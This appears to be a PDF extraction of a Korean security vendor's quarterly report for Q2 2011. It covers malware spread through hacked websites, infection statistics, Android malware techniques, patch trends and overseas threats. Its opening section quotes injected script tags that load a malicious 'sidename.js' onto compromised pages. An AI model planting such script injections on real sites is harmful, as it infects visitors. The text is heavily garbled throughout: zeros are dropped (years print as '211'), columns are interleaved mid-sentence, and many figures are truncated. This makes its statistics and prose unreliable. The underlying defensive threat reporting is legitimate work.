sidename.js를 유포하기 위해서 사용된 주소의 국가별 분포 위 주소에 언급된 76개의 사이트들에 대해서 국가, 악성코드 유포, 취약점 등 여러 가지를 분석해 보았다. 참고로 위 주소에 공개된 76개의 사이트들을 참고하여 기반으로 분석 및 작성한 것이므로 실제 내용과는 차이가 있을 수 있다. 1) 국가별 피해 사이트 현황 [그림 3-7] 국가별 피해 사이트 현황 [표 3-5] 2자리 문자 국가코드 약어 국가 명 약어 국가 명 AR 아르헨티나 ID 인도네시아 BE 벨기에 NL 네덜란드 BG 불가리아 PL 폴란드 CA 캐나다 RO 루마니아 CZ 체코 RU 러시아 DE 독일 TH 타이 ES 스페인 TR 터키 FR 프랑스 UA 우크라이나 GB 영국 US 미국 전체적인 상황을 간단하게 요약해 보면 아래 [그림 3-11]과 같다. [그림 3-11] 악성코드 유포의 전체구조 1차 난독화된 자바 스크립트를 분석해 보면 Shellcode를 얻을 수 있 다. 해당 Shellcode 내부에는 악성 PDF가 실행될 때 파일을 다운로 드 하도록 특정 URL이 암호화되어 있으며 이를 복호화 해 보면 [그 림 3-14]와 같다. [그림 3-14] 복호화된 URL 2) 침해 사이트 분석 211년 6월 18일에 모니터링 한 76개 사이트들 중에 악성코드 유포하는 것으로 확인된 274개의 사이트들에는 아래 Case들에서 브라우저를 통해 forumthrea.php에 접속할 경우 [그림3-12]처럼 76개의 사이트들에 대해서 국가별로 분류해본 결과는 [그림 3-7]과 같 고 US(미국)에 위치한 사이트들에서 피해가 가장 많이 발생했다. ETC에 포함된 국가들도 마찬가지로 분류해 보면 아래 [그림 3-8]과 같다. [그림 3-8] ETC에 포함된 국가별 피해 사이트 현황 보는 것처럼 공통적으로 sidename.js라는 자바 스크립트 링크가 삽 입되어 있었다. Case 1 '<script type=""text/javascript"" src="" ua/sidename.js""></script><script type=""text/javascript"" src="" <head>' '44 Not Found' 메세지가 나타난다. 미디어 플레이어가 실행되는 것처럼 보이지만 실제로는 취약점이 존재하는 PDF를 내려받아 실 행된다. 참고로 [그림 3-12]에서 Adobe PDF Reader의 License Agreement창이 뜨는 것은 최초 설치과정에서 발생하는 것으로 정 상적인 설치프로그램에서 보여주는 것으로 동의를 하게 되면 후에 는 나타나지 않는다. forumthrea.php에 접속 시 다운로드 되는 PDF를 분석해 보면 내부 Case 2 에 난독화된 자바 스크립트 코드가 존재한다. '<script type=""text/javascript"" src="" sidename.js""></script><!doctype html PUBLIC ""-//W3C// DTD XHTML 1. Transitional//EN"" "" xhtml1/dtd/xhtml1-transitional.dtd"">' * CVE 취약점 정보: cvename.cgi?name=cve

12 Web 년 2분기 보안 동향 1. 악성코드 동향 a. 악성코드 통계 악성코드 감염보고 2 분기 Top 2 악성코드 대표진단명 감염보고 2분기 Top 2 211년 2분기 악성코드 통계현황은 다음과 같다. 211년 2분기 악성코드 감염 보고를 살펴보면 Textimage/Autorun이 1위를 차지하고 있으며, JS/Redirect와 JS/Agent가 각각 2위와 3위를 차지 하였다. 신규로 Top2에 진입한 악성코드는 총 7건이다. 아래 표는 악성코드의 주요 동향을 파악하기 위하여, 악성코드별 변종을 종합한 악성코드 대표진단 명 감염보고 Top2이다. 211년 2분기 사용자 피해를 주도한 악성코드들의 대표진단명을 보면 Win- Trojan/Onlinegamehack이 총 보고 건수 3,952,884건으로 전체의 16%로 1위를 차지하였다. 그 뒤를 Textimage/Autorun이 2,748,919건으로 11.1%, Win-Trojan/Downloader가 2,38,41건으로 9.7%를 차 지하여 2위와 3위를 차지하였다. 순위 등락 악성코드명 건수 비율 1 Textimage/Autorun 2,748, % 2 17 JS/Redirect 1,279, % 3 JS/Agent 819, % 4 NEW Win-Trojan/Overtls27.Gen 717, % 5 3 Win32/Induc 582, % 6 NEW JS/Swflash 471, % 7 NEW Swf/Downloader 471, % 8 3 Win32/Palevo1.worm.Gen 412, % 9 NEW Win-Trojan/Winsoft CIB 41, % 1 2 Win32/Conficker.worm.Gen 346, % 11 4 JS/Exploit 322, % 12 1 Win32/Olala.worm 311, % 13 7 Win32/Virut.f 277, % 14 3 JS/Downloader 273, % 15 7 Win32/Parite 261, % 16 6 JS/Cve , % 17 NEW Win32/Flystudio.worm.Gen 245, % 18 NEW Als/Pasdoc 232, % 19 NEW Win-Trojan/Downloader , % 2 5 VBS/Solow.Gen 224,7 2.1 % 1,878,944 1 % [표 4-1] 악성코드 감염보고 2 분기 Top 2 순위 등락 악성코드명 건수 비율 1 Win-Trojan/Onlinegamehack 3,952, % 2 Textimage/Autorun 2,748, % 3 Win-Trojan/Downloader 2,38, % 4 1 Win-Trojan/Winsoft 2,32,4 9.4 % 5 1 Win-Trojan/Agent 1,989, % 6 NEW JS/Redirect 1,279, % 7 1 Win32/Conficker 1,148, % 8 1 Win32/Autorun.worm 1,111, % 9 1 Win32/Virut 93, % 1 NEW Dropper/Malware 887, % 11 4 JS/Agent 819, % 12 Win32/Kido 728, % 13 NEW Win-Trojan/Overtls27 717, % 14 1 Win-Adware/Koradware 597, % 15 4 Win32/Induc 582, % 16 Dropper/Onlinegamehack 555, % 17 1 Win32/Palevo 49, % 18 1 VBS/Solow 478, % 19 NEW JS/Swflash 471, % 2 NEW Swf/Downloader 471, % 24,662,548 1 % [표 4-2] 악성코드 대표진단명 감염보고 2분기 Top 2

13 Web 악성코드 유형별 2분기 감염보고 비율 2분기 신종 악성코드 감염보고 Top 2 아래 차트는 211년 2분기 동안 고객으로부터 감염이 보고된 악성코드 유형별 비율이다. 악성코드 유형별 감 염보고건수 비율은 트로잔류가 43.7%로 가장 많은 비율을 차지하고 있으며, 다음으로 스크립트가 15.6%, 웜이 12.8%의 비율을 각각 차지하고 있다. 아래 표는 211년 2분기에 신규로 접수된 악성코드 중 고객으로부터 감염이 보고된 악성코드 Top2이 다. 211년 2분기의 신종 악성코드 감염 보고의 Top 2은 TextImage/Autorun이 2,745,2건으로 전체 26.1%로 1위를 차지하였으며, JS/Redirect가 1,279,942건으로 2위를 차지하였다 % ADWARE 6% APPCARE.5% DOWNLOADER 1.2% DROPPER 5.1% ETC 9.7% SCRIPT 15.6% SPYWARE.6% TROJAN 43.7% VIRUS 4.8% WORM 12.8% [그림 4-1] 악성코드 유형별 2분기 감염보고 비율 악성코드 월별 2분기 감염보고 건수 TROJAN SCRIPT WORM 43.7% 15.6% 12.8% OTHER 27.9% 211년 2분기의 악성코드 월별 감염보고 건수는 46,27,884건으로 211년 1분기의 악성코드 월별 감 염 보고건수 53,944,245건에 비해 7,736,361건이 감소하였다. 순위 악성코드명 건수 비율 1 TextImage/Autorun 2,745, % 2 JS/Redirect 1,279, % 3 JS/Agent 819, % 4 Win-Trojan/Overtls27.Gen 717, % 5 Win32/Induc 582, % 6 JS/Swflash 471, % 7 SWF/Downloader 471, % 8 Win-Trojan/Winsoft CIB 41, % 9 JS/Exploit 322, % 1 Win32/Olala.worm , % 11 Win32/Virut.F 277, % 12 JS/Downloader 273, % 13 Win32/Parite 261, % 14 JS/Cve , % 15 ALS/Pasdoc 232, % 16 Win-Trojan/Downloader , % 17 VBS/Solow.Gen 224,7 2.1 % 18 Win-Trojan/Winsoft.468.BR 222, % 19 Win32/Virut 218, % 2 HTML/Shellcode 218,1 2.1 % 1,53,226 1 % [표 4-3] 신종 악성코드 감염보고 Top 2 2분기 신종 악성코드 유형별 분포 211년 2분기의 신종 악성코드 유형별 분포는 트로잔이 44%로 1위를 차지하였다. 그 뒤를 이어 스크립 트가 18%, 웜이 1% 비율을 차지하였다. 6,, 5,, 53,944,245 46,27,884-7,736,361 4,, 3,, 2,, 211.1Q 211.2Q [그림 4-2] 악성코드 월별 감염보고 건수 [그림 4-3] 신종 악성코드 분기 유형별 분포

14 Web 악성코드 동향 b. 악성코드 이슈 따라서 보안에 조금만 관심이 있는 사용자라면 이렇게 문제가 있는 애플리케이션을 설치하지 않을 가능성이 매우 높다. 또한 안드로이드 애플리케이션은 프로그램의 소스 레벨까지 분석이 용이하여 쉽게 악 사용자는 별다른 의심 없이 해당 악성코드를 설치하고 실행하게 된 다. 해당 악성코드를 살펴보면 내부 리소스 폴더에 [그림 4-9]와 같 이 보안 취약점을 사용하는 실행 파일과 추가로 설치할 악성코드를 성코드 유무를 판별할 수 있기에 이를 회피하기 위해 다양한 방법이 가지고 있는 것을 확인할 수 있다. 시도되고 있다. 이렇듯 모바일 악성코드는 보다 많은 사용자들에게 감염되고 큰 효 - 정상적인 애플리케이션을 조작하여 리패킹 한다. 과를 내기 위해 다양한 방법들을 시도할 것으로 예상된다. 또한 다음 - [그림 4-8]과 같이 리패킹한 애플리케이션 내부 폴더 중 리소스를 가 차트와 같이 모바일 악성코드의 수 또한 급격하게 증가하고 있다. 모바일 악성코드의 증가와 지능화 [그림 4-6] 프리미엄콜 서비스로 유료 SMS 발송 지고 있는 폴더에 또 다른 악성 애플리케이션을 포함시켜 리패킹 한다. - 보안 제품의 분석 및 탐지를 어렵게 하기 위해 실행 프로그램을 압축 [그림4-12] 급격히 증가하는 모바일 악성코드 최근 스마트폰에서 동작하는 모바일 악성코드가 급속도로 증가하고 해서 가지고 있는 등, 리패킹을 응용한 다양한 방법이 시도되고 있다. 있으며, 모바일 악성코드의 동작 방법 또한 날이 갈수록 지능화되고 있다. 21년 8월 경 처음 발견 된 안드로이드(Android) 용 악성코 [그림 4-8] 리소스 폴더 내부에 또 다른 악성 어플리케이션 설치본을 가 지고 있음 드의 경우 단순히 USIM, IMEI, IMSI, 휴대폰 전화번호와 같은 가입자 정보와 기기 정보들, 또는 사용자의 위치 정보를 사용자 동의 없이 외부로 유출하는 정도였다. 따라서 사용자는 직접적인 피해를 받지 않았다. [그림 4-4] SIM, IMEI, IMSI와 단말기 정보를 구하는 코드 그 후 정상적인 어플리케이션과 함께 리패킹(Repacking) 하여 서드 따라서 새로운 어플리케이션을 다운로드 받고 설치 할 때는 충분히 파티마켓(Third Party Market) 에 등록하여 사용자로 하여금 다운로 사용자들의 평가를 읽어보고 설치하는 것이 좋으며 실행 하기 전에 드 및 설치를 하게 한다. 사용자가 다운로드 받은 어플리케이션은 또한 안드로이드 단말기의 취약점을 사용하여 사용 권한을 숨긴 채 반드시 모바일용 백신을 사용하여 검사한 후 이상이 없을 경우에만 정상적으로 동작하는 것 처럼 보이지만 내부적으로는 악성코드를 다른 악성코드를 몰래 설치하는 방법도 최근 널리 사용되고 있다. 실행하는 것이 바람직하다. 내려받아 설치하는 등 공격자의 명령을 받아 다양한 기능을 수행하 이 경우 해당 취약점을 사용하기 위한 권한만 가지고 있으면 되므로 는 형태로 동작한다. 하지만 안드로이드 운영체제에서 어플리케이션 스마트폰 안전하게 사용하자. 악성 앱 정리 을 설치하려면 다음과 같이 실행 권한을 물어보고 사용자가 동의해 야 설치 된다. [그림 4-9] 내부 리소스 폴더에 가지고 있는 악의적 목적의 파일들 안드로이드 기반 악성코드가 급증하고 있다. 이는 안드로이드 앱스 토어가 개방형이므로 악성코드 제작자들이 악성코드를 올리기 쉽기 [그림 4-7] 어플리케이션 설치시 권한 확인 때문이라고 할 수 있다. 따라서 안드로이드(Android) 기반 스마트폰 에서 사용하는 어플리케이션 설치 시 주의를 기울일 필요가 있는 악 [그림 4-1] 취약점을 사용하여 단말기를 루팅시키는 실행 파일 성 어플리케이션들을 정리해보았다. [표 4-4] 악성 모바일 애플리케이션 어플리케이션 특징 [그림 4-5] 사용자 위치 정보를 구하는 코드 [그림 4-11] 다른 악성코드를 추가로 다운로드 받아 설치하는 악성코드 설치본 - 주소록에 저장된 번호로 SMS를 전송. - 특정 서버로 아래와 같은 사용자의 정보 유출 시도 * Phone numbers * IMEI number * Name 그러나 얼마 뒤 사용자 몰래 프리미엄콜(premium call)로 문자 메 시지를 보내 약 $6의 요금을 결제하도록 하는 악성코드가 발견되 었다. 금전적인 이득을 취하기 위한 형태로 모바일 악성코드가 발 전하기 시작했으며 내부적으로 문자열을 암호화하여 분석을 힘들 게하는 난독화 형태가 발견되었다. - 아래와 같은 사용자의 행위 정보를 저장 * 통화 목록 * 문자 * 웹사이트 방문 기록 * 위 정보 외에도 다수의 정보를 로그로 남기거나 서 버로 전송

15 Web 29 3 Web - 게임을 리패킹한 모바일 악성코드. - 설치 시 악의적인 ELF파일을 생성 후 악성 앱(백그 라운드로 동작) 설치를 시도하며, 아래와 같은 권한 및 행위가 발견됨 * 연락처 정보 읽기 및 데이터 생성. * 휴대전화 상태 및 ID읽기 * 전화번호 자동 연결, SMS메시지 보내기 * SD카드 콘텐츠 수정/삭제 2. 시큐리티 동향 a. 시큐리티 통계 - 정상 앱을 리패킹한 모바일 악성코드(강제 루팅 후 권한을 탈취하여 좀비화시킴) - 해당 악성코드가 설치되면 스마트폰의 다양한 정 보들을 수집하여 특정 서버로 전송. 이 후 루팅을 시도하며 성공하면 다른 악성 앱 설치 시도 (구글의 'Google Search' 앱을 위장) - 설치되는 악성 Google Search 는 서비스 형 태로 시스템 권한을 상속 받아 동작하며, 사용자 폰 을 원격통제(좀비화)하는 기능을 수행 211년 2분기 마이크로소프트 보안업데이트 현황 211년 2분기에 마이크로소프트사는 총 35건의 보안 업데이트를 발표하였다. 1분기보다 2배 이상의 보 - 브라우저나 애플리케이션으로 인터넷에 연결하게 되는 이메일이 나 문자 메시지에 있는 URL은 신중하게 클릭한다. - 백신의 패치 여부를 확인해서 최신 백신 엔진을 유지한다. - 스마트폰의 잠금 기능[암호 설정]을 이용해서 다른 사용자의 접근 을 막는다. 잠금 기능에 사용한 비밀번호를 수시로 변경한다. - 블루투스 기능 등 무선기능은 필요할 때만 켜놓는다. - 임의로 개조하거나 복사방지 등을 풀어서 사용하지 않는다 안패치가 발표되었으며, 1분기와 마찬가지로 시스템 분야의 취약점이 52%를 차지하고 있다. 또한 악성 코드 배포에 가장 많이 사용되는 오피스 취약점과 IE 취약점이 그 뒤를 차지하고 있다. 4월과 6월에 보안 패치가 17건, 16건으로 많이 발표되었으며, 패치의 중요도인 '긴급'도 많은 비중을 차지하고 있다. 현재 악성코드가 이용하고 있는 보안 취약점도 많은 만큼 개인 클라이언트 PC의 패치와 서버로 운영되는 PC 또한 빠른 시일 내에 보안 패치를 적용할 것을 권고한다. 공격 대상 기준별 MS 보안 업데이트 분류 Application Sever 11% 11% 14% 52% System Office 12% IE [그림 5-1] 신종 악성코드 분기 유형별 분포

16 Web 웹 보안 동향 a. 웹 보안 통계 월별 악성코드 유형 211년 2분기 악성코드 유형은 전 분기의 2,418건에 비해 85% 수준인 2,6건이다. 1, % % % 웹사이트 보안 요약 211년 2분기 악성코드 발견 건수는 189,948건이고, 악성코드 유형은 2,6건이며, 악성코드가 발 견된 도메인은 2,72건이며, 악성코드가 발견된 URL은 7,687건이다. 본 자료는 안철수연구소의 웹 보안 제품인 SiteGuard의 211년 2분기 자료를 바탕으로 산출한 통계정보이다. 악성코드 배포 URL 차단 건수 239, ,948 악성코드 유형 악성코드가 발견된 도메인 악성코드가 발견된 URL 2,418 2,6 [표 6-1] 웹 사이트 보안 요약 2,395 2,72-2.8% 11,89 7, [그림 6-2] 월별 악성코드 유형 월별 악성코드가 발견된 도메인 211년 2분기 악성코드가 발견된 도메인은 전 분기의 2,395건에 비해 87% 수준인 2,72건이다. 1, % % -11.2% 월별 악성코드 배포 URL 차단 건수 211년 2분기 악성코드 발견 건수는 전 분기의 239,762건에 비해 79% 수준인 189,948건이다. [그림 6-3] 월별 악성코드가 발견된 도메인 월별 악성코드가 발견된 URL ` 125, 17, % 211년 2분기 악성코드가 발견된 URL은 전 분기의 11,89건에 비해 69% 수준인 7,687건이다. 1, 75, 5, -74,795 32, % +16,399 49, % 5, 4, 3, 2, 2, % +79 2,684 +3% 2, % , 1, [그림 6-1] 월별 악성코드 발견 건수 [그림 6-4] 월별 악성코드가 발견된 URL

17 33 Web 악성코드 유형별 배포 수 악성코드 유형별 배포 수에서 애드웨어류가 36,996건으로 전체의 19.5%로 1위를 차지하였으며, 트 로잔류가 24,59건으로 전체의 12.7%로 2위를 차지하였다 유형 건수 비율 ADWARE 36, % TROJAN 24, % DROPPER 16, % DOWNLOADER 15, % Win32/VIRUS 2, % JOKE 2, % APPCARE % SPYWARE % ETC 9, % 189,948 1 % [표 6-2] 악성코드 유형별 배포 수 ETC 9,69 1, ADWARE 36,996 4, TROJAN 24,59 DROPPER 16,527 DOWNLOADER 15,873 WIN32/VIRUS 2,511 JOKE 2,435 APPCARE 571 SPYWARE 119 [그림 6-5] 악성코드 유형별 배포 수 2, 악성코드 배포 순위 악성코드 배포 Top1에서 Win32/Induc이 55,215건으로 1위를, Virus/Win32.Induc이 23,693건으로 2위를 기록하였다. 순위 등락 악성코드명 건수 비율 1 5 Win32/Induc 55, % 2 NEW Virus/Win32.Induc 23, % 3 1 Win-Adware/Shortcut.InlivePlayerActiveX.234 7, % 4 Win-Adware/Shortcut.Unni , % 5 NEW Dropper/Malware , % 6 NEW Win-Downloader/KorAdware , % 7 1 Win-Adware/ToolBar.Cashon , % 8 NEW Dropper/Malware , % 9 NEW Win-Downloader/Cybermy ,42 3. % 1 NEW Win-Adware/Shortcut.Bestcode.2 3, % 114,882 1 % [표 6-3] 악성코드 배포 Top 1

18 해외 보안 동향 1. 일본 2 분기 악성코드 동향 211년 2분기 일본에서는 지진으로 인한 사회적 혼란을 이용하여 금전 갈취를 위한 여러 유형의 사기 수법들이 발생하고 있다. 컨피커(Win32/Conficker.worm) 웜으로 인한 피해는 여전히 많이 발생하고 있으 며 안티니(Win32/Antinny.worm) 프로그램과 관련된 악성코드들 또한 크게 유행한 것으로 보인다. 컨피커 웜의 지속적인 피해 발생 컨피커 웜은 OS의 보안 취약점을 공격하거나 USB를 통해 전파되는 악성코드로 몇 년 동안 전 세계적으 로 가장 많이 유행하고 있다. [표7-1]은 일본 트랜드마이크로( 제공한 월 간 보고서의 내용 중 '부정프로그램의 월별 탐지 현황 정보'로 컨피커 웜의 피해가 매우 많이 발생하고 있 는 것을 볼 수 있다. 안티니 웜 또한 많은 피해를 유발하고 있는 것으로 나오는데 이 악성코드는 일본에서 많이 사용하는 P2P 프로그램인 위니를 공격하고 있다. 일본에서는 위니 프로그램을 공격하는 악성코드가 많이 전파되고 있 211년 4월 211년 5월 순위 진단명 유형 탐지수 진단명 유형 탐지수 1위 WORM_DOWNAD.AD 웜 4,538건 WORM_DOWNAD.AD 웜 2,634건 2위 CRCK_KEYGEN 크랙커 4,456건 CRCK_KEYGEN 크랙커 1,592건 3위 CRCK_KEYGEN 트로이목마 2,912건 MAL_Opet-3 기타 634건 다. 이미 위니 프로그램이 더 이상 제작되지 않음에도 불구하고 이 프로그램의 사용자가 여전히 많아 이 프로그램을 통해 유포되는 악성코드 또한 수년 째 기승을 부리고 있다. [표 7-1]에서 주목할 점은 실행파일을 감염시키는 파라이트(Win32/Parite)와 에드웨어인 와이에이벡터 (ADW_YABECTOR)가 다수 탐지 된 것이다. 파라이트는 21년경 처음 발견되기 시작한 파일 바이러스 이나 자체의 확산기능이 강력하지 않기 때문에 이 악성코드가 많은 감염 피해를 발생시킨 것이 아니라 다른 요인에 의해 영향을 받았을 가능성이 높아 보인다. 일례로 국내에 많이 설치되어 있는 에드웨어 프 로그램이 업데이트되는 과정에서 이 악성코드의 변형에 감염되어 유포되고 이로 인해 이 바이러스의 감 염피해가 급격히 증가한 케이스가 있다. 와이에이벡터는 인터넷 쇼핑몰에서 배포하는 광고 프로그램으로 자체 전파 기능을 가지고 있지는 않고 실행 시 바로가기 아이콘을 생성하는 등 일반적인 애드웨어의 행위를 한다. 흥미로운 것은 이 악성코드 가 광고하는 웹 사이트가 일본어 페이지를 제공하지 않고 있음에도 불구하고 일본에서 많이 탐지된 것이 다. 그러나 애드웨어의 유포경로를 알 수 없어 이와 관련한 내용을 좀더 확인할 수 없었다. 오토런 악성코드의 감염 피해 [그림7-1]은 일본 IPA( 발표한 보고서의 내용 중 월별 악성코드 피해 현황을 정 리한 그래프이다. 4위 SROJ_SPNR.3CG11 트로이목마 2,188건 WORM_ANTINNY.AI 웜 69건 5위 SROJ_SPNR.4CG11 트로이목마 2,177건 PE_PARITE.A 바이러스 595건 6위 ADW_YABECTOR 애드웨어 2,11건 WORM_ANTINNY.JB 웜 44건 7위 WORM_ANTINNY.AI 웜 1,317건 WORM_ANTINNY.F 웜 346건 8위 PE_PARITE.A 바이러스 1,313건 ADW_YABECTOR 애드웨어 313건 9위 TROJ_SPNR.3CI11 트로이목마 1,38건 HKTL_KEYGEN 크랙커 296건 1위 TROJ_SPNR.4CI11 트로이목마 1,237건 BKDR_AGENT.TID 백도어 293건 [표 7-1] 악성코드 탐지 현황 <자료출처: 트랜드마이크로 1 > [그림7-1] 211년 4,5월 악성코드 검출 추이 <자료출처: 일본 IPA 2 > 2

19 37 38 그래프에서 볼 수 있는 것은 넷스카이 웜(Win32/Netsky.worm)과 같은 2년대 중반까지 유행했던 이 메일 웜의 피해가 여전히 많이 발생하고 있는 것이다. 다행스러운 것은 이메일 웜으로 인한 피해가 미약 2. 중국 2 분기 악성코드 동향 하나마 조금씩 줄어들고 있는 것이다. 오토런(Win32/Autorun.worm)과 컨피커 웜의 피해 또한 많이 발생 하였고 실행파일을 감염시키는 파일 바이러스인 바이럿 또한 많이 감염된 것을 알 수 있다. 일본 지진과 관련한 사회공학적 공격 발생 211년 3월 일본에서 발생한 지진과 관련하여 금전 갈취를 목적으로 하는 다양한 형태의 메일이 유포되 었다. 메일의 유형에는 관공서에서 보내는 메일로 위장하거나 의연금 모금에 동참을 유도하는 등 사회공 학적 기법부터 MS 오피스 등 소프트웨어의 보안 취약점을 이용하여 악성코드를 유포하는 등 다양한 방 법들이 동원되었다. [그림7-2]는 일본 IPA에서 발표한 사기 피해관련 상담 접수 추이에 대한 정보이다. 표에서 볼 수 있는 것 처럼 작년 하반기 이후 상담 건수가 점차 감소하고 있는 상황이지만 지진이라는 특수한 상황으로 인해 실제 피해를 입는 경우가 증가할 수 있으므로 주의가 필요하다. 중국 보안 업체 라이징(Rising) 21년 중국 보안 위협 동향 발표 중국의 보안 업체 중 하나인 라이징(Rising)은 21년 한 해 동안 중국에서 발생한 다양한 보안 위협들에 대한 통계와 주요 보안 위협 이슈들을 발표하였다. 이 번 라이징에서 발표한 21년 중국 보안 위협 동 향 리포트에서 21년 한 해 동안 새로 발견된 악성코드는 총 75만 개 이며 29년 대비 56%의 증가 를 보였다. 피싱(Phishing) 웹사이트는 총 175만 개가 발견되어 29년 대비 1,186% 증가 한 것으로 분 석되었다. 특히 피싱 웹 사이트에 접속한 중국인들은 4,411만 명에 달하며 이로 인한 피해 금액은 최소 2억 위엔(한화 약 3조 6천억 원)에 이르는 것으로 파악되고 있다. 그리고 21년의 두드러진 보안 위 협의 특징으로는 금전적인 대가를 목적으로 제작되는 악성코드와 피싱 등의 보안 위협들이 중국 내에 존 재하는 블랙 마켓(Black Market)을 통한 거래가 급격하게 증가하고 있다는 점이다. 라이징에서 21년 중국 내에서 발견한 악성코드는 총 7,5,388개로 29년과 비교하여 56% 감소한 수치이지만 악성코 드로 인해 피해를 입은 중국인은 약 7억 명에 달하는 것으로 밝히고 있다. 악성코드 감염으로 인한 직 간접적인 경제적 피해를 입은 중국인들은 전체 감염 피해의 7%를 차지하 고 있으며, 그 중 약 2%는 온라인 뱅킹 트로이목마로 인해 직접적인 금전적 피해를 입은 것으로 밝혀졌 [그림7-2] 일본 IPA에서 발표한 사기 피해관련 상담 접수 추이 [그림 7-3] 21년 월별 중국에서 발견된 악성코드 수치

20 39 4 다. 21년에 급격하게 증가한 피싱 웹 사이트는 라이징에서 분석한 결과 웹 사이트의 URL 단위로 총 175만개로 29년과 비교하여 11배나 증가한 수치이다. 그리고 피싱 웹 사이트로 인해 4,411만 명이 3. 세계 2 분기 악성코드 동향 직 간접적으로 금전적 피해를 입었으며, 라이징에서 파악한 금전적 손실은 최소 2억 위엔(한화 약 3 조 6천억 원)에 이르는 것으로 파악되고 있다. 211년 2분기 세계 악성코드 동향은 이전과 큰 차이는 없다. 여전히 악성코드 주요 동향은 악성코드의 지역화, 취약점을 이용한 악성코드 배포 정도로 요약할 수 있다. 보안 프로그램을 가장해 거짓 진단 결과 로 과금을 요구하는 가짜 보안 프로그램이 윈도우를 벗어나 매킨토시(이하 맥)에도 등장했다. 안드로이드 스마트폰 기반 악성코드도 꾸준히 증가하고 있다. 세계 악성코드 통계 여전히 대부분의 악성코드는 다수의 변형이 특정 지역에 국한되어 소규모로 보고되고 있다. 악성코드가 지역화 되고 있을 뿐 아니라 백신 프로그램에서 유사 변형을 하나의 진단명으로 통합하여 진단하거나 통 계를 산출함에 따라 세계 악성코드 통계는 큰 의미가 없어졌다. 주요 보안업체 악성코드 통계에 따르면 [그림 7-4] 21년 중국에서 발견된 피싱 웹 사이트 TOP 1 발견된 피싱 웹사이트들의 형태는 Taobao( QQ 그리고 중국 공상은행이 가장 많은 피 싱 웹 사이트이다. 이러한 형태의 피싱 웹 사이트들은 발견된 전체 피싱 웹 사이트 중에서 약 76%를 차 지하고 있다. 라이징에서는 중국 내에서 블랙 마켓을 중심으로 사이버 범죄를 통한 금전이 목적이 되는 보안 위협들이 조직적으로 제작되고 있다. 이러한 보안 위협들은 전자 상거래, 금융 계정 도용과 전자 지 불 사기 등으로 이어지고 있는 것으로 분석하고 있다. 이러한 사이버 범죄적인 보안 위협의 양산을 라이 징에서는 21년의 특징으로 분석하고 있으며 이러한 특징들이 211년에도 그대로 이어질 것으로 예측 하고 있다. 컨피커(Conficker) 웜, 오토런(Autorun) 웜, 바이럿(Virut) 바이러스, 샐리티(Sality) 바이러스, 허위 보안 프 로그램 등이 꾸준히 보고되고 있다. 악성코드 배포 방식은 여전히 홈페이지 해킹 후 취약점을 이용하여 코드를 삽입, 사용자가 웹사이트 방문시 감염되는 방식과 USB메모리를 통한 전파가 주를 이뤘다. 이외 메일을 통한 배포와 페이스북 (Facebook), 마이스페이스(Myspace), 트위터(Twitter) 등의 소셜 네트워킹을 이용한 전파도 계속되고 있 다. 주요 이슈가 발생할 때마다 이슈와 관련된 내용으로 가장한 악성코드나 허위 보안 프로그램을 배포 하는 사례도 과거와 동일하다. 맥 OSX 악성코드 증가 맥 사용자가 증가하면서 맥 OSX 악성코드도 서서히 증가하고 있다. 3 사이버 암시장에도 맥 OSX 악성코 드 제작 도구가 등장했으며 4 거짓 감염 경보 후 치료를 위해 결제를 요구하는 허위 보안 프로그램도 등장 했다. 5 허위 보안 프로그램은 맥 디펜더(Mac Defender), 맥 프로텍터(Mac Protector), 맥 시큐리티(Mac Security), 맥가드(MacGuard)등의 이름을 가지며 유명 소셜 네트워크를 전파 수단으로 이용했다. 매킨토 시 사용자가 증가하면서 악성코드 제작자들도 조금씩 관심을 가지기 시작한 것으로 보인다

21 41 VOL. 18 ASEC REPORT Contributors 안드로이드 기반 악성코드 증가 211년 2분기에도 안드로이드 기반 악성코드 증가 추세가 급격하게 높아지고 있다. 안철수연구소 통계 에 따르면 안드로이드 기반 악성코드는 지난 21년 하반기부터 본격적으로 발견되기 시작해 211년에 들어 폭발적으로 증가하고 있는 추세이다. 21년 하반기에 발견된 주요 안드로이드 악성코드가 16개 인데 반해 올해 상반기까지 8개 이상 발견되어 약 5배의 증가세를 보였다. 안드로이드 기반 악성코드가 급증하는 이유는 앱스토어가 개방형이라 악성코드 제작자들이 악성코드를 올리기 용이하기 때문이다. 스 마트폰에서 안드로이드의 비중이 커지면서 앞으로도 증가할 것으로 예상된다. 64비트 악성코드 맥과 안드로이드 악성코드 등장 이외에도 64비트 윈도우 사용자가 증가하면서 64 비트 악성코드도 서서 히 등장하고 있다. TDSS도 64비트 버전이 등장했으며 온라인게임계정 탈취 악성코드 중에도 64비트 버 전이 발견되고 있다. 정보 수집 및 정보 파괴 현상 증가 211년에도 지난 몇 년 동안 꾸준히 언급된 금전적 이득 목적의 악성코드 제작과 함께 정치적 이유 등 으로 정보 수집 및 정보 파괴 현상도 계속 증가하고 있다. 소니를 해킹해 유명해진 해킹그룹 룰즈섹 (LulzSec)은 이후 미 상원 웹사이트, CIA 아틀란티스 지사, 미국 애리조나 경찰 사이트 등을 해킹했다. 단 순 재미 외에 어떤 정치적 성향이 있는지에 관심이 집중되고 있으며 향후 이런 정치성향을 가진 해커들 이 어떤 활동을 펼칠지도 관심을 끌고 있다. 금전적 혹은 정치적 목적의 타겟 공격 역시 꾸준히 보고되 고 있다. 최근 몇 년 동안 주로 국가기관과 주요 기업에 행해지던 타겟 공격이 국제통화기금(International Monetary Fund), 구글 메일 사용자 등으로 점차 확대되었다. 보통 정보 유출이 목적인 타겟 공격은 공격 받은 쪽에서 사용된 악성코드를 신고하지 않는다면 알려진 악성코드를 탐지하는 백신이 무용지물이 될 수 있다. 공격자는 보통 이미 알려진 악성코드를 이용하지 않아 공격받는 사람이 신고하지 않으면 백신 업체에도 샘플이 없기 때문이다. 기업에서는 타겟공격에 대항하기 위해 보안제품 외 간단한 악성코드를 분석할 수 있는 분석가도 조만간 필요하지 않을까 싶다. 편집장 선임 연구원 집필진 책임 연구원 선임 연구원 선임 연구원 선임 연구원 선임 연구원 주임 연구원 연구원 감수 상무 참여연구원 안 형 봉 차 민 석 김 소 헌 박 시 준 안 창 용 장 영 준 조 주 봉 조 보 화 조 시 행 ASEC 연구원 SiteGuard 연구원 Disclosure to or reproduction for others without the specific written authorization of AhnLab is prohibited. Copyright (c) AhnLab, Inc. All rights reserved. 6 구글(Google)을 리더로 하는 OHA(Open Handset Alliance) 컨소시엄에서 제작 및 배포하는 비독점 개방 플랫폼을 지향하는 모바일 운영체제이다. 2안드로이드(Android) 실행 파일을 변조하고 휴대폰에 설치할 수 있는 형태인 APK로 다시 만드는 행위 3정식적인 안드로이드 마켓이 아닌 제 3의 어플리케이션 마켓으로 